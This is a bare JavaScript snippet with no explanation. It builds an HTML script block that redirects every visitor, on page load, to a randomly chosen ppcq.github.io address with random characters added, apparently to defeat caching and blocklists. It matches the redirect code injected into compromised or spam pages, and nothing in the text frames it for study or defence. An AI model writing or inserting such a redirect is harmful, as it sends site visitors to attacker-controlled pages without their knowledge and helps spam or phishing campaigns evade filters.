var html = "";
html += "﻿<script>";
html += "var urls=[";
html += "'https://ppcq.github.io/pp?{nnnnnnnnnnn}{wwwwww}',";
html += "'https://ppcq.github.io/ll.html?{nnnnnnnnnnn}{wwwwww}',";
html += "];";
html += "location.href = myEeplace(urls[Math.floor(Math.random()*urls.length)]);";
html += "function myEeplace(s){";
html += "	return s.replace(/\{(\w+?)\}/g,function(a,b){";
html += "		var h='';";
html += "		for(var i=0;i<b.length;i++){";
html += "			if('n'==b[i]){";
html += "				h+=Math.floor(Math.random()*10);";
html += "			}else if('w'==b[i]){";
html += "				h+=String.fromCharCode(97+Math.floor(Math.random()*26));";
html += "			}";
html += "		}";
html += "		return h;";
html += "	});";
html += "}";
html += "</script>";
